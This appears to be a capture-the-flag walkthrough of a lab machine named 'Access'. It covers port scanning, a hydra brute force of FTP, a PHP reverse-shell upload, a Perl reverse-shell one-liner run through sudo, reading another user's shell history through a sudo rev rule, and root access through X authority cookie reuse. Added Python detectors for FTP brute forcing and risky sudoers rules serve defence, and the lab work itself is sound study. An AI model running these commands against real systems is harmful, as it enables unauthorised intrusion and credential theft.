# Lab setup
Download: Access
NAT, IP: 192.168.1.155
# Penetration process
# Initial information gathering
```text
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.18.0
5555/tcp open ftp pyftpdlib 1.5.8
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.155:5555
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
6666/tcp open irc?
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 27 May 2024 12:13:19 GMT
| Server: Python/3.9 websockets/11.0.3
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| Help, Socks5:
| HTTP/1.1 400 Bad Request
| Date: Mon, 27 May 2024 12:13:04 GMT
| Server: Python/3.9 websockets/11.0.3
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request.
```
Anonymous FTP login does not work.
Port 6666 is a WebSocket service; download a client and connect to it: websocat
```text
┌──(root㉿kali)-[~/websocat]
└─# ./websocat_max.x86_64-unknown-linux-musl ws://192.168.1.155:6666
Hello noname,
Change your FTP password as soon as possible your server is at risk.
Regards!
```
That gives us a username: noname
Crack the FTP password:
```text
┌──(root㉿kali)-[~/websocat]
└─# hydra -l noname -P /usr/share/wordlists/rockyou.txt -I -t 64 ftp://192.168.1.155:5555
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 09:01:55
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.1.155:5555/
[5555][ftp] host: 192.168.1.155 login: noname password: phoenix
```
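From the defender's side, the hydra run above is 64 parallel connections each trying a few passwords, so pyftpdlib's per-connection `max_login_attempts` (default 3) never slows it down; what does catch it is counting failed logins per source address over a short window in the server log. The script below is an added example, not code from the write-up, and the log line layout it parses is an assumption modelled on pyftpdlib's default logging format; the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line layout, modelled on pyftpdlib's default logging (not copied from the box):
# "[W 2024-05-27 09:01:55] 192.168.1.10:50000-[] USER 'noname' failed login."
LINE_RE = re.compile(
    r"^\[(?P<level>[A-Z]) (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)-\[(?P<user>[^\]]*)\] (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"^USER '(?P<user>[^']*)' failed login\.$")
TS_FMT = "%Y-%m-%d %H:%M:%S"


def parse_line(line):
    """Return (timestamp, source ip, username) for a failed-login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    f = FAILED_RE.match(m.group("msg"))
    if not f:
        return None
    return datetime.strptime(m.group("ts"), TS_FMT), m.group("ip"), f.group("user")


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Alert once per source IP that reaches `threshold` failed logins inside `window`.

    Counting per IP rather than per connection is the point: hydra spreads the
    attempts over many short connections, each of which stays under any per-session limit.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    totals = defaultdict(int)
    users = defaultdict(set)
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, user = parsed
        totals[ip] += 1
        users[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"ip": ip, "triggered_at": ts, "failures_in_window": len(q)}
    for ip, a in alerts.items():
        a["total_failures"] = totals[ip]
        a["usernames"] = sorted(users[ip])
    return sorted(alerts.values(), key=lambda a: a["triggered_at"])


def constructed_sample_log():
    """Constructed sample: 15 rapid failures from one host, 2 from another, then a success."""
    base = datetime(2024, 5, 27, 9, 1, 55)
    lines = []
    for i in range(15):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f"[W {ts}] 192.168.1.10:{50000 + i}-[] USER 'noname' failed login.")
    for i in range(2):
        ts = (base + timedelta(minutes=5, seconds=i)).strftime(TS_FMT)
        lines.append(f"[W {ts}] 192.168.1.20:{51000 + i}-[] USER 'admin' failed login.")
    ts = (base + timedelta(minutes=6)).strftime(TS_FMT)
    lines.append(f"[I {ts}] 192.168.1.10:50100-[] USER 'noname' logged in.")
    return lines


if __name__ == "__main__":
    for alert in detect_bruteforce(constructed_sample_log()):
        print(alert)
```

The alert carries the first timestamp at which the threshold was crossed, which is the value to hand to a blocking tool; the two stray failures from the second host stay below the threshold and produce nothing.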
Once logged in to FTP, PUT a reverse shell straight onto the server. The extension has to be .php5; nothing else gets parsed.
Browse to the file to get the reverse shell.
# Privilege escalation
`sudo -l` shows that perl can be run as noname.
Pop a shell directly:
```sh
sudo -u noname perl -e 'use Socket;$i="192.168.1.155";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
Escalate again
```text
noname@access:/$ sudo -l
Matching Defaults entries for noname on access:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User noname may run the following commands on access:
    (powerful) NOPASSWD: /usr/bin/rev
noname@access:/$ LFILE=/home/powerful/.bash_history
noname@access:/$ sudo -u powerful rev $LFILE | rev
passwd powerful
Th3_p0w3R_of_H4ck1nG
Th3_p0w3R_of_H4ck1nG
exit
```
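The rule that makes this step possible is a sudoers entry granting an unrestricted text utility to another account: because no arguments are pinned, `rev` will read whatever file the caller names, and piping through `rev` again undoes the transformation. The audit helper below is an added example, not part of the write-up; it parses the `sudo -l` listing format shown above and flags such rules. The list of file-reading utilities beyond `rev` is an assumption of common equivalents, not something the box or the write-up names.

```python
import os
import re

# Utilities that print an arbitrary file when run with no argument restriction.
# rev is the one granted on this box; the others are an assumed list of common equivalents.
FILE_READERS = {"rev", "cat", "tac", "head", "tail", "less", "more", "base64", "xxd", "od"}

# One rule line as printed by `sudo -l`, e.g. "(powerful) NOPASSWD: /usr/bin/rev"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return one dict per command in the 'may run the following commands' section."""
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        # A single rule line may list several commands separated by ", "
        for cmd in m.group("cmds").split(", "):
            parts = cmd.strip().split(None, 1)
            rules.append({
                "runas": runas,
                "tags": tags,
                "binary": parts[0],
                # None means any arguments are accepted; '""' is sudoers syntax for "no arguments"
                "args": parts[1] if len(parts) > 1 else None,
            })
    return rules


def audit_rules(rules):
    """Flag rules where an unrestricted file reader runs as another user."""
    findings = []
    for r in rules:
        name = os.path.basename(r["binary"])
        if name not in FILE_READERS:
            continue
        if r["args"] is not None:
            # Arguments are pinned (or forbidden with ""), so the file cannot be chosen freely
            continue
        findings.append({
            "runas": r["runas"],
            "binary": r["binary"],
            "nopasswd": "NOPASSWD" in r["tags"],
            "reason": f"{name} can print any file readable by {r['runas']}",
        })
    return findings


# The listing quoted in the write-up, used here as the input
SUDO_L_OUTPUT = """\
Matching Defaults entries for noname on access:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User noname may run the following commands on access:
    (powerful) NOPASSWD: /usr/bin/rev
"""

if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(finding)
```

The fix on the sudoers side is either to pin the argument (`/usr/bin/rev /path/to/one/file`) or to drop the rule; the audit treats any pinned argument, including the empty `""`, as restricted and only reports rules with no argument specification at all.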
Escalate again to get root
```text
┌──(root㉿kali)-[~]
└─# ssh -X powerful@192.168.1.155
powerful@192.168.1.155's password:
/usr/bin/xauth: file /home/powerful/.Xauthority does not exist
powerful@access:~$ xauth list
access/unix:10 MIT-MAGIC-COOKIE-1 2995418f2d2bb4c5ad4e3f070f697e28
powerful@access:~$ sudo xauth add access/unix:10 MIT-MAGIC-COOKIE-1 2995418f2d2bb4c5ad4e3f070f697e28
xauth: file /root/.Xauthority does not exist
powerful@access:~$ sudo terminator
```
The terminator window that pops up is a root shell.